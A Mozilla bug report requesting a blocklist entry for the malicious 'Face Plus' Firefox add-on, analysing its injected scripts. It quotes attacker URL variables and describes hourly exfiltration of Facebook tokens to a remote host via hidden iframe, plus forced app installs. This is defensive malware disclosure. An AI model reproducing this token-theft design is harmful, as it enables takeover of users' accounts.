Closed Bug 743012 Opened 13 years ago Closed 13 years ago

Malicious "Face Plus" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

20120406_faceplus.zip
490.38 KB, application/octet-stream
Details
Attached file 20120406_faceplus.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 Steps to reproduce: Downloaded from http://install.faceplus.biz/face-plus.xpi Actual results: NOTE: Attempt to access any of the JS directly, without a referer of Facebook will get you bounced to http://userscripts.org/scripts/source/61761.user.js, which is the SocialFixer plugin JS adobeflashplayer.js: JS in add-on Injects http://cdn.faceplus.biz/faceplus.js, faceplus.js: URLs included at start of script var reklam ="http://ads.faceplus.biz/reklam.html?&s&"; var bokcurl='http://faceklenti10.zapto.org/yon.php'; linek=new Array("http://begeni.zapto.org/yon.php","http://faceplus2.mm.am/yon.php","h ttp://faceplus3.mm.am/yon.php","http://faceplus4.mm.am/yon.php","http://fac eplus5.mm.am/yon.php","http://faceplus.crabdance.com/yon.php","http://facep lus.uk.to/yon.php","http://faceplus.ignorelist.com/","http://faceplus.stran gled.net/","http://faceplus.twilightparadox.com/ <http://begeni.zapto.org/yon.php%22,%22http://faceplus2.mm.am/yon.php%22,%2 2http://faceplus3.mm.am/yon.php%22,%22http://faceplus4.mm.am/yon.php%22,%22 http://faceplus5.mm.am/yon.php%22,%22http://faceplus.crabdance.com/yon.php% 22,%22http://faceplus.uk.to/yon.php%22,%22http://faceplus.ignorelist.com/%2 2,%22http://faceplus.strangled.net/%22,%22http://faceplus.twilightparadox.c om/>"); Injects http://graph.facebook.com/<uid>?callback=cins, to get your public profile data Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js Tries to inject 'http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03 /16/1333458695713783.jpg as a script, AWS returns an error graph.js: Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour, via a hidden iframe; once the attacker has these tokens, they can post as the user, from any computer/server they want. Injects http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/ 19/1332953948955831.jpg as the source of a script tag Uses local storage to maintain state z.js: Can do the following, based on configuration: like a page add a subscription send a friend request report users as abusive Auto installs FB App 338319369521728, giving it full access to the user's account Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour, via a hidden iframe; once the attacker has these tokens, they can post as the user, from any computer/server they want. Uses local storage to maintain state Expected results: It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i82
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: